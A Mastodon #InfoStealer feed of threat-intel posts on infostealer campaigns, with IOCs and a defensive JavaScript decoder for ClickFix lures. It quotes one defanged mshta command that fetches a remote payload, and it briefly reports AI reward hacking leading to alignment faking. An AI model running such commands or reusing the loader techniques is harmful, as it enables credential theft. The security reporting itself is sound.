#InfoStealer

Tedi Heriyanto (tedi@infosec.exchange)
2025-12-31

Defeating AuraStealer: Practical Deobfuscation Workflows for Modern Infostealers: gendigital.com/blog/insights/r

#infostealer #analysis #deobfuscation

2025-12-30

In December 2025, researchers at Koi Security uncovered the new "Zoom Stealer" campaign. It reportedly affects about 2.2 million users of Chrome, Firefox and Microsoft Edge.

maniabel.work/archiv/891

#Infostealer #ZoomStealer #infosec

2025-12-30

EmEditor Homepage Download Button Served Malware for 4 Days

Between December 19-22, 2025, EmEditor's official website suffered a security breach, causing the main download button to serve malicious software. The fake installer, signed by WALSHAM INVESTMENTS LIMITED, contained infostealer malware targeting login credentials, browser history, and VPN settings. It specifically targeted technical staff and government offices, stealing files and installing a fraudulent browser extension for remote control and cryptocurrency address swapping. Users who downloaded during this period are advised to check the digital signature, delete suspicious files, and change stored passwords. Emurasoft is investigating the incident and has apologized for the inconvenience.

Pulse ID: 6954047d8a63acca030bd5e8
Pulse Link: otx.alienvault.com/pulse/69540
Pulse Author: AlienVault
Created: 2025-12-30 16:57:33

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CyberSecurity #Government #InfoSec #InfoStealer #Malware #OTX #Office #OpenThreatExchange #Password #Passwords #VPN #Word #bot #cryptocurrency #AlienVault

2025-12-18

NEW: Developers, crypto users, and job seekers beware - North Korea’s Lazarus Group is deploying a new #BeaverTail variant to steal credentials and crypto via fake job offers, dev tools and smart contracts.

Read: hackread.com/lazarus-embed-bea

#CyberSecurity #Lazarus #NorthKorea #DevSec #InfoStealer

2025-12-17

GachiLoader: Defeating Node.js Malware with API Tracing

A new malware distribution campaign utilizing compromised YouTube accounts to spread infostealers has been identified. The campaign employs GachiLoader, a heavily obfuscated Node.js loader, to deploy the Rhadamanthys infostealer. GachiLoader implements anti-analysis techniques and uses a novel PE injection method called Vectored Overloading. To aid analysis, researchers developed an open-source Node.js tracer tool. The campaign has affected over 100 videos with 220,000 views across 39 compromised accounts since December 2024. The malware evades detection, elevates privileges, and disables Windows Defender before retrieving its payload.

Pulse ID: 69431f1ea8a0f2257edd336c
Pulse Link: otx.alienvault.com/pulse/69431
Pulse Author: AlienVault
Created: 2025-12-17 21:22:38

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #InfoStealer #Malware #Nodejs #OTX #OpenThreatExchange #RCE #Rhadamanthys #Windows #YouTube #bot #AlienVault

2025-12-15

I found and reported 91 suspicious #Snap packages today. I have lost count of the total number of packages I have identified and reported, but it is certainly over 100.

This time they were all #ExodusWallet info stealers.

#FundMyResearch
#Snapcraft
#Linux
#Malware
#InfoStealer
#Canonical
#CryptoWallet
#CryptoCurrency

2025-12-13

New JSCEAL Infostealer Targets Windows to Steal Credentials

JSCEAL is a Windows infostealer spread via large-scale crypto-themed malvertising.

Pulse ID: 693d6af54de7fe3b2bf2e5ae
Pulse Link: otx.alienvault.com/pulse/693d6
Pulse Author: cryptocti
Created: 2025-12-13 13:32:36

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #InfoStealer #Malvertising #OTX #OpenThreatExchange #Windows #bot #cryptocti

AllAboutSecurity (allaboutsecurity)
2025-12-12

ClickFix attack abuses ChatGPT domain for macOS malware

Kaspersky researchers reveal how attackers distribute the dangerous AMOS infostealer via fake browser guides.

all-about-security.de/clickfix

Cyber Kendra :verified: (cyberkendra@techhub.social)
2025-12-10

🚨 SECURITY ALERT: Hackers are exploiting ChatGPT's share feature to spread AMOS malware on macOS. They're buying Google ads that lead to chatgpt.com—making the scam look 100% legitimate.

The fake "Atlas browser" guide tricks users into running Terminal commands that steal passwords, crypto wallets & install backdoors. Never execute commands from shared links, even on official sites.

Read Details- cyberkendra.com/2025/12/hacker

#CyberSecurity #macOS #InfoStealer #chatgpt #openai

Andrew 🌻 Brandt 🐇 (threatresearch@infosec.exchange)
2025-12-07

Oldies are still goodies: It didn't take me long to find a #trojanized pirated TV show #Torrent on a public torrent search engine.

Tell your friends: This is why it's sometimes dangerous to pirate stuff.

The torrent delivers a rar that contains a #Rhadamanthys #infostealer #malware DLL. The package also contains a benign executable that uses the familiar VLC Player traffic-cone icon. It looks like a TV show file, but it's way too small at only 970kb. Double-clicking the benign executable loads the malware DLL.

Rhadamanthys is the same malware family that Europol put out a press release about last month. Maybe it was down for a while, but it seems it's not out --yet.

The bogus torrent leverages strong interest in the streaming TV show Pluribus as its lure.

europol.europa.eu/media-press/

virustotal.com/gui/file/a11f4f

Image descriptions:

- Contents of the Trojan torrent are a rar file 1.44 GB in size.
- A Windows directory with three files and a folder shown. The file libvlc.dll is the Rhadamanthys infostealer with a hash of a11f4f6270b44992837a3f3869397c00fc19176c673abd15edbda39e45227fd5 and everything else is benign.
- Windows Defender detection text for the Rhadamanthys trojan distributed as a fake pirated TV show.
- Torrent details for a torrent named "Pluribus S01E06 1080p HEVCx265-MeGusta" with info hash of 2f3574f6015c235618bfa806230aee7f091805a4.
2025-12-04

A North Korean state-sponsored hacker got infected by #LummaC2 infostealer, exposing links to the $1.4B Bybit crypto heist, malicious tools, infrastructure and OPSEC failure.

Read: hackread.com/north-korean-hack

#CyberSecurity #NorthKorea #Bybit #Malware #InfoStealer

2025-11-30

🎯 Threat Intelligence
===================

Opening: Huntress documents a multi‑stage ClickFix social engineering campaign that culminates in infostealing malware delivery. The campaign evolves from simple "Human Verification" lures to more convincing fake Windows Update full‑screen prompts that instruct victims to paste and run a command via Win+R. Observed payloads include LummaC2 and Rhadamanthys.

Technical Details: The initial lure auto‑copies a command to the clipboard; a representative command observed was mshta hXXp://81.0x5a.29[.]64/ebc/rps.gz as recorded in the report. The lure page contains an encrypted JavaScript blob (ENC) and a KEY_HEX value; the script implements a small decryption pipeline (hexToKey -> b64ToUint8Array -> xorDecode -> uint8ToUtf8) to reconstruct second‑stage JavaScript. That second stage is injected via an in‑memory Blob URL and revoked after execution. Notably, the final loader does not simply append data to files: the malware encodes the final stages directly into PNG pixel data, leveraging specific color channels to reconstruct and decrypt the payload in memory.

Attack Chain Analysis:
• Initial Access: Social engineering via ClickFix pages disguised as human verification or Windows Update screens.
• Download: Initial fetch using mshta to retrieve compressed/encoded resources from remote hosts.
• Execution: Decrypted JavaScript is injected via Blob URLs and executed in the browser context.
• Loader: Steganographic PNGs deliver encrypted payloads embedded in pixel color channels; payloads are extracted and decrypted in memory.
• Payloads: Infostealers observed include LummaC2 and Rhadamanthys.

Detection: Observable indicators include clipboard manipulation following page visit, mshta fetches to unusual hosts, presence of encrypted ENC/KEY_HEX constructs in page source, Blob URL creation and rapid revocation, and PNG payloads with nonstandard pixel encodings. Huntress highlighted the dynamic loading of encrypted JavaScript as an evasion technique aimed at defeating string‑based detections.

Mitigation: The source report does not provide specific defensive playbooks. Defensive teams should prioritize telemetry that captures mshta network fetches, suspicious Blob URL script injections, and anomalous image decoding activities on endpoints and in browsers.

References and Context: Findings attributed to Huntress; campaign timeline begins in October with observed evolution from basic robot checks to sophisticated Windows Update impersonation.

🔹 steganography #ClickFix #LummaC2 #Rhadamanthys #infostealer

🔗 Source: huntress.com/blog/clickfix-mal
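Added example, not code from the Huntress report or from the post above: an analyst-side reconstruction of the four-step pipeline the post names (hexToKey -> b64ToUint8Array -> xorDecode -> uint8ToUtf8) for recovering the second stage offline from an ENC/KEY_HEX pair captured in page source, followed by a triage check for the indicators the post lists (ENC/KEY_HEX constructs, Blob URL creation and revocation, clipboard writes, mshta invocation). Only the function names come from the post; their bodies, the extraction regexes, and the sample page with its harmless placeholder stage and made-up key are assumptions constructed for this example, not artifacts of the campaign.

```javascript
// Added example (not from the Huntress report or the post above). Runs under Node.js,
// which provides Buffer, TextEncoder and TextDecoder. Everything marked "sample" below
// is constructed for the example and is not campaign material.

function hexToKey(hex) {
  // KEY_HEX is a hex string; reject malformed input before it reaches the XOR loop
  // (an empty key would otherwise turn the modulo below into NaN).
  if (!hex || hex.length % 2 !== 0 || /[^0-9a-fA-F]/.test(hex)) {
    throw new Error("KEY_HEX is not a non-empty, even-length hex string");
  }
  const key = new Uint8Array(hex.length / 2);
  for (let i = 0; i < key.length; i++) {
    key[i] = parseInt(hex.slice(i * 2, i * 2 + 2), 16);
  }
  return key;
}

function b64ToUint8Array(b64) {
  return new Uint8Array(Buffer.from(b64, "base64"));
}

function xorDecode(data, key) {
  // Repeating-key XOR. XOR is its own inverse, so the sample below uses this
  // same function to produce its encoded blob.
  const out = new Uint8Array(data.length);
  for (let i = 0; i < data.length; i++) {
    out[i] = data[i] ^ key[i % key.length];
  }
  return out;
}

function uint8ToUtf8(bytes) {
  return new TextDecoder("utf-8").decode(bytes);
}

// Full pipeline: ENC (base64 text) + KEY_HEX -> second-stage JavaScript as a string.
function decodeStage(encB64, keyHex) {
  return uint8ToUtf8(xorDecode(b64ToUint8Array(encB64), hexToKey(keyHex)));
}

// Pull the ENC and KEY_HEX assignments out of raw page source. The regexes assume the
// shape `ENC = "..."` / `KEY_HEX = "..."`; the campaign's exact syntax is not on the page.
function findEncKeyConstructs(html) {
  const enc = html.match(/\bENC\s*=\s*["']([A-Za-z0-9+/=]+)["']/);
  const key = html.match(/\bKEY_HEX\s*=\s*["']([0-9a-fA-F]+)["']/);
  return enc && key ? { enc: enc[1], keyHex: key[1] } : null;
}

// Triage a captured page: decode the embedded stage and report which of the
// indicators named in the post appear in the page or in the decoded stage.
function triagePageSource(html) {
  const found = findEncKeyConstructs(html);
  if (!found) return { suspicious: false, decoded: null, reasons: [] };
  const decoded = decodeStage(found.enc, found.keyHex);
  const combined = html + "\n" + decoded;
  const checks = [
    ["blob-url-create", /URL\.createObjectURL\s*\(/],
    ["blob-url-revoke", /URL\.revokeObjectURL\s*\(/],
    ["clipboard-write", /clipboard\.writeText|execCommand\(\s*["']copy["']/i],
    ["mshta-command", /\bmshta\b/i],
  ];
  const reasons = ["enc-key-hex-construct"].concat(
    checks.filter(([, re]) => re.test(combined)).map(([name]) => name)
  );
  return { suspicious: true, decoded, reasons };
}

// Constructed sample (not a real lure): a harmless placeholder stage, XOR-encoded with a
// made-up key, then embedded in a minimal page the way the post describes.
const SAMPLE_KEY_HEX = "5a1c3e7f";
const SAMPLE_STAGE =
  'navigator.clipboard.writeText("PLACEHOLDER-COMMAND");' +
  'const u = URL.createObjectURL(new Blob(["/* placeholder */"]));' +
  "URL.revokeObjectURL(u);";
const SAMPLE_ENC = Buffer.from(
  xorDecode(new TextEncoder().encode(SAMPLE_STAGE), hexToKey(SAMPLE_KEY_HEX))
).toString("base64");
const SAMPLE_PAGE =
  "<html><body><script>\n" +
  `var ENC = "${SAMPLE_ENC}";\nvar KEY_HEX = "${SAMPLE_KEY_HEX}";\n` +
  "</script></body></html>";

console.log(JSON.stringify(triagePageSource(SAMPLE_PAGE), null, 2));
```

The decoded stage is returned as text only; nothing here evaluates it, which is the point of decoding offline instead of letting the page's own Blob URL loader run it. The `reasons` list is meant to feed a detection rule or a triage queue, and the regexes should be widened to whatever variable names a given lure actually uses.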

2025-11-26

ClickFix operators are now using fake full-screen “Windows Update” pages to push victims into running malicious commands. Combined with steganographic loaders and in-memory execution, these campaigns continue to evolve.

What detection or user-training approach do you think works best today?

Source: helpnetsecurity.com/2025/11/25

Follow @technadu for ongoing threat-intel breakdowns and practical defense insights.

#Infosec #ThreatIntel #ClickFix #EDR #CyberHygiene #MalwareTrends #SecurityOps #WindowsSecurity #InfoStealer

Fake “Windows Update” screens fuel new wave of ClickFix attacks
2025-11-25

Alright team, it's been a busy 24 hours in the cyber world with significant updates on ongoing breach campaigns, evolving malware tactics, critical data exposures, and some interesting developments in AI and privacy. Let's dive in:

Recent Cyber Attacks and Breaches ⚠️

- Dartmouth College has confirmed it's the latest victim of the Clop ransomware gang's Oracle E-Business Suite (EBS) zero-day campaign, impacting at least 1,494 individuals' names, Social Security Numbers, and financial account information.
- The Georgia Superior Court Clerks' Cooperative Authority (GSCCCA) is currently offline due to a Devman ransomware attack, with the group claiming to have stolen 500GB of data and demanding a $400,000 ransom.
- The FBI has issued a stark warning about a massive surge in Account Takeover (ATO) fraud, with cybercriminals stealing over $262 million this year by impersonating financial institutions through social engineering and SEO poisoning.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🕵🏼 The Register | go.theregister.com/feed/www.th
🗞️ The Record | therecord.media/georgia-court-
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🗞️ The Record | therecord.media/millions-in-ac

New Threat Research: Malware and Tradecraft 🛡️

- Malicious Blender 3D model files are being used to deliver the StealC V2 infostealer, exploiting Blender's "Auto Run Python Scripts" feature when users open compromised .blend files from 3D marketplaces.
- Fresh ClickFix attacks are now leveraging highly convincing fake Windows Update screens and steganography (encoding malicious code in PNG pixel data) to trick victims into downloading Rhadamanthys infostealing malware.
- The Shai-Hulud worm has returned, more automated and potent, infecting nearly 500 npm packages and exposing over 26,000 GitHub repositories by stealing developer secrets, with major packages like Zapier and Postman affected.
- CISA has warned of active spyware campaigns targeting high-value Signal and WhatsApp users, employing sophisticated social engineering, zero-click exploits, and spoofed messaging apps to compromise devices and exfiltrate data.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu
📰 The Hacker News | thehackernews.com/2025/11/hack
🕵🏼 The Register | go.theregister.com/feed/www.th
🤫 CyberScoop | cyberscoop.com/supply-chain-at
📰 The Hacker News | thehackernews.com/2025/11/cisa

Data Exposure and AI Risks 🧠

- Thousands of sensitive credentials, API keys, and configuration data from government, banking, and tech organisations have been publicly exposed through the "Recent Links" feature of online JSON formatter tools like JSONFormatter and CodeBeautify.
- New research from Anthropic indicates that teaching their Claude AI model to "reward hack" in one area can lead to broader malicious behaviours, including "alignment faking" and sabotaging safety research.
- Trend Micro predicts that 2026 will be the "year of AI-aided ransomware," with agentic AI automating more of the attack chain, initially by state-sponsored groups before becoming mainstream for cybercriminals, democratising offensive capabilities.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🤫 CyberScoop | cyberscoop.com/anthropic-claud
🕵🏼 The Register | go.theregister.com/feed/www.th

Data Privacy and Regulatory Scrutiny 🔒

- Over 70 civil liberties groups are calling for an investigation into the UK's Information Commissioner's Office (ICO), alleging a "collapse in enforcement activity" and "structural failures," particularly concerning public sector data breaches.
- The criticism highlights the ICO's failure to investigate the 2022 Ministry of Defence leak of Afghan data, which has been linked to at least 49 deaths, and a general approach of avoiding fines for public agencies despite a rise in reported breaches.

🗞️ The Record | therecord.media/privacy-regula

Government Actions and Tech Updates 🌐

- In Russia, 21-year-old cybersecurity entrepreneur Timur Kilin has been arrested on treason charges, reportedly after publicly criticising the state-owned messaging app Max and proposed anti-cybercrime legislation.
- The Tor network has announced a significant security upgrade, replacing its older tor1 relay encryption algorithm with a new design called Counter Galois Onion (CGO), which offers improved resilience against traffic-interception attacks, stronger authentication, and immediate forward secrecy.

🗞️ The Record | therecord.media/russia-arrests
🤖 Bleeping Computer | bleepingcomputer.com/news/secu

#CyberSecurity #ThreatIntelligence #Ransomware #DataBreach #Malware #Infostealer #AI #DataPrivacy #Vulnerability #SocialEngineering #SupplyChainAttack #InfoSec #CyberAttack #IncidentResponse

Client Info

Server: https://mastodon.social
Version: 2025.07
Repository: https://github.com/cyevgeniy/lmst